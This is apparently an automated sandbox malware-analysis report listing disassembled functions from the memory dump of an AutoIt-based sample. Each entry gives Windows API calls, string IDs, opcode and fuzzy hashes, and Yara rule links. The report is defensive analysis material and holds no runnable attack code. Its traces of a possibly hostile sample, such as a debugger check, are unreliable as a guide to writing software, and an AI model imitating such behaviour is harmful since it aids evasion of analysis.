                                                                                                                                                                                                                                                                                        Function 00F675ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • CharUpperBuffW.USER32(?,?,?), ref: 00F6761D
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F67629
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                        • String ID: STOP
                                                                                                                                                                                                                                                                                        • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                        • Opcode ID: 457265b498fc8f6039e806c4333fd3254e5a24dfa58343300a18d5571d2e6b62
                                                                                                                                                                                                                                                                                        • Instruction ID: 02868791a67080dd7217d64291f87172015b2f24f04be2c4ea2d99fbf8632317
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 457265b498fc8f6039e806c4333fd3254e5a24dfa58343300a18d5571d2e6b62
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E001C432A14A2B8BDB10BFBDDC509BF73B5AB607687500628E421D2191EB36D900F650
                                                                                                                                                                                                                                                                                        Function 00F6262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F62699
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                        • Opcode ID: 51213d8fef53ff06ad1492f7b7a4119b5c2817455d8aeb9394ca6486c4aad6e8
                                                                                                                                                                                                                                                                                        • Instruction ID: c78a575d936f7927e652bb94e2c95d087d987269aaebe9293822f68e590075b9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51213d8fef53ff06ad1492f7b7a4119b5c2817455d8aeb9394ca6486c4aad6e8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9601D475A01215ABCB44EBA4CC51DFE7768EF86360B14061AB832972C1DA369808FB61
                                                                                                                                                                                                                                                                                        Function 00F62525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F62593
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                        • Opcode ID: d4cf520ab3daf2aba5d2112185065d5dd372cef698623dec2d77bd125939c442
                                                                                                                                                                                                                                                                                        • Instruction ID: e32bedfeb711d96b0f561f955f0b9fe26c148bb8a1fa21eaf40aaf82259a5121
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4cf520ab3daf2aba5d2112185065d5dd372cef698623dec2d77bd125939c442
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3601A775A411056BCB14E790CD62EFE77A8DF45340F5800197803A32C1DA14DE08B6B2
                                                                                                                                                                                                                                                                                        Function 00F625A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F62615
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                        • Opcode ID: 9b824f1bdea11ded01cd67d99a8068821504a1bc7dea39bacfb576bc465719b4
                                                                                                                                                                                                                                                                                        • Instruction ID: 872bc998b9a8aa3c4fdbdd27d49c7fbaf6443d581705abfb2546657f9537cf17
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b824f1bdea11ded01cd67d99a8068821504a1bc7dea39bacfb576bc465719b4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1301A276A4510566CB15E7A0CE02FFE77A89F05340F54002AB802A32C1DB659E08B6B2
                                                                                                                                                                                                                                                                                        Function 00F626B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00F62720
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                        • Opcode ID: 61994a664d812c6ca077d0c9e991d03cabe66e114ec0ad5fb0c380b83edefa4f
                                                                                                                                                                                                                                                                                        • Instruction ID: e7e607c53f8d217bf077aff364e6a9ad78ad1754d67f796e15a70233ef0a7fa7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61994a664d812c6ca077d0c9e991d03cabe66e114ec0ad5fb0c380b83edefa4f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44F0F475A4121566CB04B3A48C42FFE7368AF41390F540919B822A32C1DB65A808B661
                                                                                                                                                                                                                                                                                        Function 00F61461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F6146F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                        • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                        • Opcode ID: 2ab51d4a6662f9d080a5b8f985a396134955596fc6aec174f6b921821ff6beae
                                                                                                                                                                                                                                                                                        • Instruction ID: 3935a57c8ff397b924a246abf45752d184f3bb12ab6e8554a3336be6164d1634
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ab51d4a6662f9d080a5b8f985a396134955596fc6aec174f6b921821ff6beae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21E0483234872937E7143794BC03F8576848F05F61F35441AF788954C38EF664A0729A
                                                                                                                                                                                                                                                                                        Function 00F210B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F210E2,?,?,?,00F0100A), ref: 00F1FAD9
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00F0100A), ref: 00F210E6
                                                                                                                                                                                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F0100A), ref: 00F210F5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F210F0
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                        • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                        • Opcode ID: 0d5e399d1bc6325cbd4bce7c93ec21509e0ad553f7af0a5a51622ca87de3f71b
                                                                                                                                                                                                                                                                                        • Instruction ID: 6390bf41f7a8581e8ecabdc18f411a51f537cb3637bc4eba0e40f6df13c84a89
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d5e399d1bc6325cbd4bce7c93ec21509e0ad553f7af0a5a51622ca87de3f71b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AE0ED706007618BD3709F24E945752BBE8FF14705F14895DE885C2691EFB8D484FB95
                                                                                                                                                                                                                                                                                        Function 00F739D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00F739F0
                                                                                                                                                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00F73A05
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                        • String ID: aut
                                                                                                                                                                                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                        • Opcode ID: c517c1db4f7aba6e966693ed97fc81bb85b025bcd05e17b4de2204dd4948a8c6
                                                                                                                                                                                                                                                                                        • Instruction ID: 03c50675b7ea59de88750668af6c64cdb6b82082cd45a3e0d3d7c49a0a402825
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c517c1db4f7aba6e966693ed97fc81bb85b025bcd05e17b4de2204dd4948a8c6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5D05E725003286BDB20A7649C0EFCB7A6CDB84760F0002A2BA65920A1DAB4DA85CB90
                                                                                                                                                                                                                                                                                        Function 00F92DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F92E08
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000), ref: 00F92E0F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6F292: Sleep.KERNEL32 ref: 00F6F30A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                        • Opcode ID: fbcf5c2615e90acb5a7d545ca2f2335aa4a5743e3b7b8ef48d21be9e28bad719
                                                                                                                                                                                                                                                                                        • Instruction ID: 3a4ef281572bc538a2788a0cbf6feb4593c6e59f871dd45d443b1c8d378876e9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fbcf5c2615e90acb5a7d545ca2f2335aa4a5743e3b7b8ef48d21be9e28bad719
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1D0A9323813087AE224B330AD0BFC23A109B40B00F2008267305AA0C0C8A0A8009A54
                                                                                                                                                                                                                                                                                        Function 00F92DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F92DC8
                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F92DDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6F292: Sleep.KERNEL32 ref: 00F6F30A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                        • Opcode ID: f5b5454861adfac8671d80c9e187ef60adab826919c42d5f48c53b13fbfb9b9b
                                                                                                                                                                                                                                                                                        • Instruction ID: 90475f0b33aad869591bdad3854ae74b1d17a676488f3b50779e0230eb13f456
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5b5454861adfac8671d80c9e187ef60adab826919c42d5f48c53b13fbfb9b9b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8D02236384308B7E224B330BD0FFD23B109F40B00F2008267309AB0C0C8E0A800DB50
                                                                                                                                                                                                                                                                                        Function 00F3C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00F3C213
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F3C221
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00F3C27C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8dc9eaa5a022dcfda0446735c1bf5d7583619d56ff96bdd2c2268ccf860dad25
                                                                                                                                                                                                                                                                                        • Instruction ID: 4c39b0cc07948211664f8c713fc09448acdc37cb8c6b74fe010a0a2617ded399
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8dc9eaa5a022dcfda0446735c1bf5d7583619d56ff96bdd2c2268ccf860dad25
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E641B431A00215EFDB259FE5C844BAB7BA5EF51730F254169E859BB2A1DB30CD01EBB0